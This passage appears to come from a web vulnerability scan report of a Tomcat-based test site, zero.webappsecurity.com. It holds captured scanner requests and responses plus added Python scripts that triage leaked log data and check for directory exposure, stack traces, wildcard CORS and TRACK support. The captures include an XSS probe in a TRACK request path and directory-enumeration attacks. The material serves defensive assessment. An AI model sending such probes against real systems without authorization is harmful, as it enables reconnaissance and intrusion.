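    r"^(?P<client>\S+)\s+(?P<time>\d{1,2}:\d{2})\s+(?P<mode>[AB])\s+"
    r"(?P<local>.+?)\s+(?P<arrow><--|-->)\s+(?P<host>\S+)\s+(?P<rdir>\S+)\s+(?P<rfile>\S+)$"
)


def parse_line(line: str) -> Optional[Transfer]:
    """One log line to a Transfer, or None for lines that do not fit the layout."""
    m = LINE.match(line.strip())
    if not m:
        return None
    return Transfer(
        m["client"], m["time"], m["mode"], m["local"],
        "download" if m["arrow"] == "<--" else "upload",
        m["host"], m["rdir"], m["rfile"],
    )


def parse_log(text: str) -> List[Transfer]:
    return [t for t in (parse_line(line) for line in text.splitlines()) if t]


def path_root(path: str, depth: int = 2) -> str:
    """First `depth` components of a Windows path, e.g. C:\\old_repo."""
    return "\\".join(path.replace("/", "\\").split("\\")[:depth])


def is_private(host: str) -> bool:
    """True for RFC 1918 / loopback style addresses; False for host names."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def summarize(transfers: List[Transfer]) -> Dict[str, object]:
    """What the log leaks: internal clients, hosts and deployment path roots."""
    return {
        "private_clients": sorted({t.client for t in transfers if is_private(t.client)}),
        "remote_hosts": sorted({t.remote_host for t in transfers}),
        "local_roots": sorted({path_root(t.local_path) for t in transfers}),
        "remote_roots": sorted({path_root(t.remote_dir) for t in transfers}),
        "uploads": sum(t.direction == "upload" for t in transfers),
        "downloads": sum(t.direction == "download" for t in transfers),
    }


# Re-joined from the captured excerpt; the fifth, truncated line is left out.
SAMPLE_LOG = r"""
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.htm
"""


def sample_summary() -> Dict[str, object]:
    return summarize(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for key, value in sample_summary().items():
        print(f"{key:16} {value}")
```

The point of the summary is triage: a private client address and a named internal host are what a later phishing or lateral-movement step would be built on, and the path roots tell an attacker where the site's source tree lives. The file itself should simply not be under the web root; the 504686-byte Content-Length above says it is the complete log, not a fragment.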
Page:

http://zero.webappsecurity.com:80/docs/windows-auth-howto.html

Request:
GET /docs/windows-auth-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="FF70A74D422C22B72591B6C68DE7DBA3";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e2085897-d964-4fb8-80e5-97e2cc35784c";
X-Request-Memo: ID="49bd3422-4472-4f1c-8766-5779e21a7e15"; sc="2"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:43 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"27921-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 27921
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
...TRUNCATED...e):
<div class="codeBox"><pre><code>ktpass /out c:\tomcat.keytab /mapuser tc01@DEV.LOCAL
/p...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/html-manager-howto.html

Request:
GET /docs/html-manager-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/manager-howto.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="05A583C38101A149DDE1801354194040";
PSID="112FD5EEB1B0EC04177727EFB7E63F42"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="d0d7bc4d-0890-4888-83b0-3fba7c4590da";
X-Request-Memo: ID="28331577-d871-46f2-a1ce-9381e852cd17"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:03 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"36392-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 36392
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
...TRUNCATED...he web application located in the directory
<code>C:\path\to\foo</code> on the Tomcat server (running on...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

http://zero.webappsecurity.com:80/admin/

Request:
GET /admin/ HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="F9F85B774F218404194F09238B4A9EF9";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="60b8f839-2e70-4177-8e47-f305852be435"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10810"; Engine="Site+Search";
SmartMode="NonServerSpecificOnly"; ThreadId="83"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="0b1fd969-d62c-48aa-afac-df632dd5414f";
X-Request-Memo: ID="ec653cd9-e832-4472-bd32-8079961169ab"; sc="1"; ThreadId="102";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798

Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:27 GMT
Server: ...TRUNCATED...

System Information Leak: LDAP Query


Page:

description

http://zero.webappsecurity.com:80/docs/realm-howto.html

Request:
GET /docs/realm-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="1ECABF8131D9FB74C4F25E6F3BB95533";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1a2ace84-1955-4345-a9e8-fadc02fda9ec";
X-Request-Memo: ID="642ab42b-ae55-4a13-8cf5-90b8052483f9"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"67464-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 67464
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED...he.catalina.realm.JNDIRealm"
connectionURL="ldap://localhost:389"
userPattern="uid={0},ou=people,dc=mycomp...TRUNCATED...he.catalina.realm.JNDIRealm"
connectionURL="ldap://localhost:389"
userBase="ou=people,dc=mycompany,dc=c...TRUNCATED...
connectionPassword="secret"
connectionURL="ldap://localhost:389"
userPassword="userPassword"
userP...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/listeners.html

Request:
GET /docs/config/listeners.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jndi-datasource-examples-howto.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="696E82F0D0DB9E2D37764BFE766D74AE";
PSID="4005A3D0BF6D3E8BFED6DB64AB0C2F8D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b2a89a24-3bdf-406a-8fb4-51431fde34cb";
X-Request-Memo: ID="455c0f28-12af-4d34-b488-f28ad4437f21"; sc="2"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:24 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"42468-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 42468
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
...TRUNCATED...ule.LdapLoginModule REQUIRED
userProvider="ldap://ldap-svr/ou=people,dc=example,dc=com"
userFilte...TRUNCATED...

Poor Error Handling: Server Error Message


Page:

description

http://zero.webappsecurity.com:80/account/

Request:
GET /account/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="551A58F3CAE8D76CCDEE29CAB920CF53";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10220"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="0dcb8edc-da07-4d15-8bb4-66a65d53899d";
X-Request-Memo: ID="50ed1642-dcbc-4d5c-8f13-cb22de7c9c32"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 500 Internal Server Error
Date: Mon, 10 Oct 2016 07:...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/<script>alert('TRACK');</script>

Request:
TRACK /<script>alert('TRACK');</script> HTTP/1.1
Referer: http://zero.webappsecurity.com/manager/html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="A4FB02D5C410323E6D90001C41301D87";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="65cee7d3-561f-40dc-b5eb-c0b8c2383fcb"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5152"; Engine="Request+Modify";
SmartMode="NonServerSpecificOnly"; ThreadId="89"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="f4a152a7-ef66-4ced-ae43-1145129b2717";
X-Request-Memo: ID="2f9e2ddb-775d-4ead-bdb8-816756b2f322"; sc="1"; ThreadId="102";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 501 Not Implemented
Date: Mon, 10 Oct 2016 07:52:21 ...TRUNCATED...
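The findings in this section are all decidable from the captured exchanges alone: probed directories answering 403 (the path exists) or 200 (reachable, possibly listed), the 500 on /account/ that carries a Spring JDBC stack frame, the 501 to TRACK, and the Access-Control-Allow-Origin: * that every /docs/ response above sends. The script below re-applies those checks offline so a second reviewer can confirm or dismiss each entry without rescanning. It is an added example, not WebInspect's own check logic and not code from the scanned site; SAMPLE_EXCHANGES are constructed from the status lines and headers the report records (bodies are stand-ins, except for the stack frame, which is the one quoted in the report), and the tag names and the listing-page title patterns are the example's own assumptions.

```python
"""Offline triage of captured HTTP exchanges for the finding classes in this
section: unprotected directories, unhandled exceptions (stack traces),
overly permissive CORS and TRACE/TRACK support.

Added example, not WebInspect code and not code from the scanned site.
SAMPLE_EXCHANGES are constructed from the status lines and headers the
report records; bodies are stand-ins apart from the quoted stack frame.
"""
import re
from typing import Dict, List, NamedTuple, Optional


class Response(NamedTuple):
    status: int
    headers: Dict[str, str]   # header names lower-cased
    body: str


def parse_response(raw: str) -> Response:
    """Split a raw HTTP/1.x response into status code, headers and body."""
    parts = re.split(r"\r?\n\r?\n", raw, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else "")
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return Response(status, headers, body)


# Java stack frame as Tomcat/Spring print it: "at pkg.Class.method(File.java:123)"
STACK_FRAME = re.compile(r"\bat [\w$.]+\([\w$]+\.java:\d+\)")
# Auto-index titles (assumed patterns): Tomcat DefaultServlet and Apache httpd
LISTING = re.compile(r"Directory Listing For|<title>Index of /", re.I)


def check_exception(resp: Response) -> Optional[str]:
    """A stack frame in any body is a leak; a bare 500 is an unhandled error."""
    if STACK_FRAME.search(resp.body):
        return "stack-trace-disclosed"
    if resp.status == 500:
        return "server-error"
    return None


def check_directory(path: str, resp: Response) -> Optional[str]:
    """Classify a probed directory: listed, reachable, or merely present."""
    if not path.endswith("/"):
        return None
    if resp.status == 200:
        return "directory-listing" if LISTING.search(resp.body) else "directory-reachable"
    # 403 still confirms the path exists; a 404 would not.
    if resp.status == 403:
        return "directory-present-forbidden"
    return None


def check_cors(resp: Response) -> Optional[str]:
    """Wildcard ACAO exposes the body to any origin; with credentials it is worse."""
    acao = resp.headers.get("access-control-allow-origin")
    if acao == "*":
        creds = resp.headers.get("access-control-allow-credentials", "").lower()
        return "cors-wildcard-with-credentials" if creds == "true" else "cors-wildcard"
    return None


def check_trace(method: str, resp: Response) -> Optional[str]:
    """TRACE/TRACK answered 200 echoes the request (cross-site tracing); 501/405 is fine."""
    if method.upper() in ("TRACE", "TRACK") and resp.status == 200:
        return "trace-enabled"
    return None


def triage(method: str, path: str, raw: str) -> List[str]:
    resp = parse_response(raw)
    tags = [check_exception(resp), check_directory(path, resp),
            check_cors(resp), check_trace(method, resp)]
    return [t for t in tags if t]


# Constructed from the report's status lines/headers; bodies are stand-ins.
SAMPLE_EXCHANGES = [
    ("GET", "/account/",
     "HTTP/1.1 500 Internal Server Error\r\nServer: Apache-Coyote/1.1\r\n"
     "Access-Control-Allow-Origin: *\r\nContent-Type: text/html;charset=UTF-8\r\n\r\n"
     "user lacks privilege or object not found: INDEX\n"
     "\tat org.springframework.jdbc.support.SQLExceptionSubclassTranslator"
     ".doTranslate(SQLExceptionSubclassTranslator.java:95)\n"),
    ("GET", "/errors/",
     "HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nContent-Type: text/html\r\n\r\n"
     "<html><head><title>Directory Listing For /errors/</title></head></html>"),
    ("GET", "/db/",
     "HTTP/1.1 403 Forbidden\r\nServer: Apache-Coyote/1.1\r\n\r\n"),
    ("TRACK", "/<script>alert('TRACK');</script>",
     "HTTP/1.1 501 Not Implemented\r\nServer: Apache-Coyote/1.1\r\n\r\n"),
]


def triage_all() -> Dict[str, List[str]]:
    return {path: triage(m, path, raw) for m, path, raw in SAMPLE_EXCHANGES}


if __name__ == "__main__":
    for path, tags in triage_all().items():
        print(f"{path:40} {', '.join(tags) or 'clean'}")
```

Two caveats the tags encode. A 403 on a guessed directory is not the same severity as a 200: it confirms the name but returns nothing, so it belongs in an informational bucket rather than beside the 200 on /errors/ and /docs/. And the TRACK entry in the report is a 501, which is the correct answer; the scanner logged the probe, not a hit, so that item needs no action.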

HTML5: Overly Permissive CORS Policy


Page:

description

http://zero.webappsecurity.com:80/docs/funcspecs/index.html

Request:
GET /docs/funcspecs/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9ED4F10AC6184B9298A6A51C297C202A";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ac0bae26-fb9e-448e-9639-491c1b5a57a4";
X-Request-Memo: ID="4d993be0-b9b5-48aa-b934-5d30dea3ccc9"; sc="2"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:57 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"8461-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 8461
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Catalina Functional
Specifications (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
Catalina Functional Specifications
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Functional Specs</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Administrative Apps</strong></p><ul><li><a
href="fs-admin-apps.html">Overall Requirements</a></li><li><a href="mbean-names.html">Tomcat MBean
Names</a></li><li><a href="fs-admin-objects.html">Administered Objects</a></li><li><a href="fs-admin-opers.html">Supported Operations</a></li></ul><p><strong>Internal Servlets</strong></p><ul><li><a href="fs-default.html">Default Servlet</a></li></ul><p><strong>Realm Implementations</strong></p><ul><li><a href="fs-jdbc-realm.html">JDBC Realm</a></li><li><a href="fs-jndi-realm.html">JNDI Realm</a></li><li><a href="fs-memory-realm.
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/docs/servletapi/index.html

Request:
GET /docs/servletapi/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9A374CF6133C82D2A83C2624AADBEB16";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1403531a-d139-41f6-a815-87b38535cc27";
X-Request-Memo: ID="1e647ffc-4e3e-44cf-988c-fcabc862b92f"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:46 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1323-1466008840000"
Last-Modified: Wed, 15 Jun 2016 16:40:40 GMT
Content-Type: text/html
Content-Length: 1323
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The Servlet Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/websocketapi/

Request:
GET /docs/websocketapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/websocketapi/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="93F640E9C0950666F44249BE903412FF";
PSID="5BE22692ADEF2CF19E101E8F2AE21ECC"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="93"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="55"; smi="0"; sc="1"; ID="e9559930-7746-478d-9434-4a8e41960913";
X-Request-Memo: ID="86a327bd-5c9a-43fc-a122-c5bce0732f93"; sc="1"; ThreadId="109";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=B17F0383
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:32 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1185-1466008840000"
Last-Modified: Wed, 15 Jun 2016 16:40:40 GMT
Content-Type: text/html
Content-Length: 1185
Keep-Alive: timeout=5, max=14
Connection: Keep-Alive
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>API docs</title>
</head>
<body>
The WebSocket Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/appdev/sample/

Request:
GET /docs/appdev/sample/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="B2C4DB9BD43BD67F563C5590060864D1";
PSID="16A0FCA95F27748B361F869AE08E40BF"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b67d6926-e16e-4203-8af2-9905667eb186";
X-Request-Memo: ID="aecfdea2-744b-43a1-a28c-4004b66050ab"; sc="2"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:20 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1852-1466008838000"
